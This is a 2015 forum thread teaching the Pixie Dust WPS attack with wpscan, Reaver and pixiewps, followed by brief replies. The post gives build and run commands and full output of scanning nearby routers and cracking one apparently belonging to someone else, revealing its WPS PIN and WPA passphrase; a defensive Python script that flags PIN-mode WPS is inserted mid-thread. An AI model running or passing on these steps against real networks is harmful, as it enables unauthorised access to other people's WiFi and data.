WiFi Hacking 2015 - Pixie Dust Explained. - Conch - 05-03-2015
Hello members.
This is my first tutorial, this was also posted on another forum but it was shut down.
This is fully written by myself.
What is Pixie Dust?
Pixie Dust is a new method for hacking WiFi; it utilizes WPS flaws (Reaver, anyone?).
Anyhow, this was discovered back in 2014; however, tools to exploit it have surfaced.
NFO:
Quote:Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.
Pre-requisites / Tools.
Reaver V1.5.1 [Automated PIN finder and Pre-shared Key output] Reaver Fork V1.5.1 Automation.
WPScan (Scans targets for chipset) WPScan Download.
PixieWPS. Download PixieWPS.
Any Linux Distribution.
What is required?
PKR. (Public Key Registrar.)
PKE. (Public Key Enrollee.)
AuthKey.
E-Hash1.
E-Hash2.
M1 Enrollee Nonce.
However... we don't need any of these, since the Reaver automation does all the work.
All we need is the -K option.
This exploit works on ALL Ralink chipsets, and some Broadcom [other chipsets are currently unconfirmed].
This is why we need WPScan, to check what chipsets the APs (Access Points) have.
First of all, check the needed dependencies on Github and compile.
Quote:cd reaver-xxxxxxx/src/
./configure
make
make install
Replace xxxxxxx with the full path to the Reaver mod.
Now cd into WPSPixie.
Quote:cd src
make
make install
make install requires root [sudo]!
Now let's run it!
Quote:python wpscan.py
Getting IPv6 errors?
Suppress them!
http://tech.xster.net/tips/suppress-scapy-ipv6-warning/
Here is the output from wpscan.py:
Quote:BSSID: 84:9C:XX:XX:XX:XX
ESSID: EE-BrightBox-94k225
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
AP Setup Locked : 0x01
Response Type : 0x03
UUID-E : 0x0000000000000144ff00010000340144
Manufacturer : Arcadyan
Model Name : Arcadyan
Model Number : 123456
Serial Number : 12345
Primary Device Type : 0x00060050f2040001
Device Name : EEBB
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120
BSSID: 40:CB:XX:XX:XX:XX
ESSID: TALKTALK-6F8DF0
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x6304125310192006122840cba86f8df2
Manufacturer : Realtek Semiconductor Corp.
Model Name : RTL8671
Model Number : EV-2006-07-27
Serial Number : 123456789012347
Primary Device Type : 0x00060050f2040001
Device Name : ADSL Modem/Router
Config Methods : 0x0082
BSSID: C0:3E:XX:XX:XX:XX
ESSID: The-Uncultured
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x5d04b66a5cc96731cc792a0d06c5a6e5
Manufacturer : Broadcom
Model Name : Broadcom
Model Number : 123456
Serial Number : 1234
Primary Device Type : 0x00060050f2040001
Device Name : BroadcomAP
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120
BSSID: C0:3E:XX:XX:XX:XX
ESSID: SKY34B29
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x8b413fdc755492098b7efa523e5704d5
Manufacturer : Broadcom
Model Name : Broadcom
Model Number : 123456
Serial Number : 1234
Primary Device Type : 0x00060050f2040001
Device Name : BroadcomAP
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120
BSSID: 18:28:XX:XX:XX:XX
ESSID: SKYFB7A2
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x76c89082d4ee5b10268d1030634cb5fd
Manufacturer : AirTies Wireless Networks
Model Name : SB601
Model Number : 1.0.0.76
Serial Number : AT1581349000812
Primary Device Type : 0x00060050f2040001
Device Name : SB601
Config Methods : 0x0004
RF Bands : 0x01
Unknown : 0x00372a000120
Unknown : 0x007fc510001841079c17e5f6495b85e7c75df07d03423030303030303031
BSSID: E8:CC:XX:XX:XX:XX
ESSID: TALKTALK-0E965E
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0xbc329e001dd811b28601e8cc180e965e
Manufacturer : D-Link Corporation.
Model Name : D-Link Wireless Access Point
Model Number : RT2860
Serial Number : 12345678
Primary Device Type : 0x00060050f2040001
Device Name : D-LinkAP
Config Methods : 0x210c
RF Bands : 0x00
Unknown : 0x00372a000120
BSSID: 7C:4C:XX:XX:XX:XX
ESSID: SKY64FAD
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
UUID-E : 0x8ea906caba9af72e2e48bed45ee78837
Manufacturer : Broadcom
Model Name : Broadcom
Model Number : 123456
Serial Number : 1234
Primary Device Type : 0x00060050f2040001
Device Name : BroadcomAP
Config Methods : 0x200c
RF Bands : 0x01
Unknown : 0x00372a000120
Sadly we got no Ralink (VERY vulnerable),
but we did get some Broadcom. Let's choose one.
I'll choose this one: TALKTALK-0E965E
Now let's run it through Reaver.
Quote:reaver -i mon0 -b E8:CC:XX:XX:XX:XX -vv -K 1
Quote:[?] Restore previous session for E8:CC:XX:XX:XX:XX? [n/Y] n
[+] Waiting for beacon from E8:CC:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2
[+] Switching mon0 to channel 3
[+] Switching mon0 to channel 4
[+] Switching mon0 to channel 5
[+] Switching mon0 to channel 6
[+] Switching mon0 to channel 7
[+] Switching mon0 to channel 8
[+] Switching mon0 to channel 9
[+] Switching mon0 to channel 10
[+] Switching mon0 to channel 11
[+] Associated with E8:CC:XX:XX:XX:XX (ESSID: TALKTALK-0E965E)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c9:2f:61:b1:60:95:58:2c:a1:81:25:46:14:cb:ff:d6
[P] PKE: 13:06:df:33:fc:17:6e:f4:5c:c0:25:c6:9a:10:b1:43:bc:3b:6c:de:cb:f3:fb:17:a2:21:c0:00:ef:09:6f:9c:e9:f0:bd:4f:ba:6c:95:bc:b7:7d:c0:16:22:51:00:c6:84:63:af:93:1c:19:75:05:4a:ad:00:f4:91:3a:60:96:3c:34:dd:95:d5:ac:6f:07:f6:58:8a:e8:04:f9:6b:fb:9e:d2:c5:7d:d8:9c:9f:ff:f7:97:75:b3:37:47:b6:2d:e3:ef:97:9f:07:6a:a7:09:12:0c:3d:7a:47:73:f5:9c:a2:cc:12:fb:a5:a4:51:f2:42:1f:2b:27:d0:0d:15:76:ec:4e:09:56:cc:17:ed:96:1b:e7:8c:44:50:63:3b:9d:45:db:aa:4a:07:05:02:b2:5c:3a:65:de:5b:40:9f:42:34:ec:94:1e:32:c2:5c:07:b8:bc:13:0f:27:52:f7:7e:37:63:97:eb:7c:ce:d8:57:76:ba:1a:35:84:b9:b1:e3
[P] WPS Manufacturer: D-Link Corporation.
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] PKR: f0:14:fd:8a:bd:d6:5a:4e:17:b5:97:c8:8b:30:7f:34:d0:44:76:97:7c:56:d5:15:db:6c:e6:a5:f3:ae:1d:58:78:cf:e6:20:b8:ed:69:27:8b:94:e8:33:8f:c7:3b:c4:66:e8:b2:63:a5:5f:af:83:9e:a7:03:57:4d:39:d5:01:b2:19:38:91:e8:44:6a:c5:b5:a7:98:16:ea:07:ec:e2:87:5e:4f:9c:3c:68:b7:9e:c8:ea:b7:c7:d3:da:95:85:6f:de:43:3f:51:e4:0a:05:df:0a:fa:83:70:6e:aa:e8:18:69:ac:6f:ca:2b:f8:9d:36:f0:a8:de:65:85:e3:1d:8c:a8:99:11:20:c3:bc:c9:88:a5:2d:37:a5:5c:0c:8a:1d:24:d9:61:19:43:d5:75:0f:1d:07:83:b5:0a:b2:74:ca:c1:f1:03:a2:9c:b6:ff:10:22:0a:2f:d7:4b:71:85:88:66:22:b4:48:0a:27:0f:ec:62:3a:84:56:78:c9:97
[P] AuthKey: ab:3a:38:46:a3:98:e2:cc:34:58:cb:63:ae:0e:3c:f6:e8:e9:16:52:b0:0f:1e:ed:e1:84:37:8d:38:78:67:0a
[+] Sending M2 message
[P] E-Hash1: 46:5e:9f:a8:0e:da:af:32:83:0d:e4:3d:a8:ef:a2:32:9b:52:fd:50:e4:96:3e:d5:7c:f3:cf:c3:2d:36:94:72
[P] E-Hash2: 5f:a0:b2:45:19:69:e1:90:25:18:d4:4c:a5:8f:82:f9:b5:ba:34:e2:80:e5:38:05:a9:2e:39:cc:be:d6:de:e2
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: 30:28:1d:c5:3e:ca:24:42:3e:f8:db:b3:10:6c:a5:1e
[Pixie-Dust] [*] PSK2: ae:f4:c9:22:80:d4:cc:a0:79:25:9d:dc:0b:bf:dc:50
[Pixie-Dust] [+] WPS pin: 09559981
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b E8:CC:XX:XX:XX:XX-c 11 -s y -p 09559981
[Reaver Test] BSSID: E8:CC:18:0E:96:5E
[Reaver Test] Channel: 11
[Reaver Test] [+] WPS PIN: '09559981'
[Reaver Test] [+] WPA PSK: 'JFQCGD4C'
[Reaver Test] [+] AP SSID: 'TALKTALK-0E965E'
And there we have it! A WiFi password in less than 5 seconds!
I hope you enjoyed this tutorial!
Warm Regards,
Conch.
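As an added example from the defender's side (this is not part of the original post, nor code from the wpscan, Reaver or pixiewps projects), here is a small Python audit script that parses wpscan.py-style output like the listing above, decodes the WSC "Config Methods" bitmask, and flags any AP that has WPS configured and advertises a PIN-based method, i.e. the APs on which WPS (or at least PIN mode) should be switched off. The sample records are copied from the scan above; the field names follow the scan output and the bit names follow the WSC specification; the HIGH/MEDIUM/LOW verdict rules are my own assumption for triage.

```python
# Constructed sample: three records taken from the wpscan.py listing in the post above.
SAMPLE_SCAN = """\
BSSID: 84:9C:XX:XX:XX:XX
ESSID: EE-BrightBox-94k225
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
AP Setup Locked : 0x01
Response Type : 0x03
Manufacturer : Arcadyan
Model Name : Arcadyan
Config Methods : 0x200c
RF Bands : 0x01
BSSID: 40:CB:XX:XX:XX:XX
ESSID: TALKTALK-6F8DF0
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
Manufacturer : Realtek Semiconductor Corp.
Model Name : RTL8671
Config Methods : 0x0082
BSSID: E8:CC:XX:XX:XX:XX
ESSID: TALKTALK-0E965E
----------------------------------------------------------
Version : 0x10
WPS State : 0x02
Response Type : 0x03
Manufacturer : D-Link Corporation.
Model Name : D-Link Wireless Access Point
Model Number : RT2860
Config Methods : 0x210c
RF Bands : 0x00
"""

# WSC "Config Methods" attribute bitmask, names as in the WSC specification.
CONFIG_METHODS = {
    0x0001: "USBA",
    0x0002: "Ethernet",
    0x0004: "Label",
    0x0008: "Display",
    0x0010: "External NFC Token",
    0x0020: "Integrated NFC Token",
    0x0040: "NFC Interface",
    0x0080: "PushButton",
    0x0100: "Keypad",
    0x0200: "Virtual PushButton",
    0x0400: "Physical PushButton",
    0x2000: "Virtual Display PIN",
    0x4000: "Physical Display PIN",
}

# Methods that imply a PIN exchange (sticker label, display, keypad, display-PIN variants).
PIN_MASK = 0x0004 | 0x0008 | 0x0100 | 0x2000 | 0x4000

WPS_STATE_CONFIGURED = 0x02  # WSC "Wi-Fi Protected Setup State" value for a configured AP


def parse_wpscan(text):
    """Split wpscan.py-style output into one dict per BSSID block."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("BSSID:"):
            current = {"BSSID": line.split(":", 1)[1].strip()}
            records.append(current)
        elif current is not None and line.startswith("ESSID:"):
            current["ESSID"] = line.split(":", 1)[1].strip()
        elif current is not None and " : " in line:
            key, value = line.split(" : ", 1)
            current[key.strip()] = value.strip()
    return records


def decode_config_methods(value):
    """Expand a Config Methods bitmask into method names, lowest bit first."""
    return [name for bit, name in sorted(CONFIG_METHODS.items()) if value & bit]


def assess(record):
    """Assumed triage rule: WPS configured + PIN method advertised is the case to fix."""
    state = int(record.get("WPS State", "0x00"), 16)
    locked = int(record.get("AP Setup Locked", "0x00"), 16) == 0x01
    methods = int(record.get("Config Methods", "0x0000"), 16)
    pin_exposed = bool(methods & PIN_MASK)
    if state != WPS_STATE_CONFIGURED:
        verdict = "INFO"    # WPS IE present but not configured; still worth disabling
    elif pin_exposed and not locked:
        verdict = "HIGH"    # PIN mode advertised, external registrar not locked
    elif pin_exposed:
        verdict = "MEDIUM"  # locked now, but the lock is usually a temporary rate limit
    else:
        verdict = "LOW"     # only push-button / wired methods advertised
    return {
        "bssid": record["BSSID"],
        "essid": record.get("ESSID", ""),
        "manufacturer": record.get("Manufacturer", ""),
        "methods": decode_config_methods(methods),
        "pin_exposed": pin_exposed,
        "setup_locked": locked,
        "verdict": verdict,
    }


def audit(text):
    return [assess(r) for r in parse_wpscan(text)]


if __name__ == "__main__":
    for row in audit(SAMPLE_SCAN):
        print(f"{row['verdict']:6} {row['bssid']} {row['essid']:22} "
              f"{row['manufacturer']:28} {', '.join(row['methods'])}")
```

Run against the listing above, the script marks TALKTALK-0E965E (the AP the post goes on to use) as HIGH because it has WPS configured and advertises Label, Display, Keypad and Virtual Display PIN, while the Realtek AP that only advertises PushButton and Ethernet comes out LOW. The fix in every case is the same: turn WPS off in the router's admin interface, since the "AP Setup Locked" flag is generally a temporary lockout rather than a configuration change.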
RE: WiFi Hacking 2015 - Pixie Dust Explained. - general_lee - 05-15-2015
Oh thank you! This is so much faster than just reaver!
RE: WiFi Hacking 2015 - Pixie Dust Explained. - rod - 08-21-2015
Interesting read, thanks for sharing
RE: WiFi Hacking 2015 - Pixie Dust Explained. - mothered - 08-23-2015
The thread is over 3 months old, but nonetheless, some very interesting reading.
Well documented, referenced and elaborated.
RE: WiFi Hacking 2015 - Pixie Dust Explained. - Exkr - 08-23-2015
Nice tutorial. Will bookmark and give it a try when I'm on my home network.
RE: WiFi Hacking 2015 - Pixie Dust Explained. - trickguru - 12-03-2015
Nice tutorial, well explained. Thank you very much.
RE: WiFi Hacking 2015 - Pixie Dust Explained. - meow - 12-03-2015
This isn't an exploit so much as it is a bruteforce tool. Also, I don't see any actual explanation here... this thread is just you showing us that you're able to use some tools to get some random joe's router password without any elaboration on what's actually going on.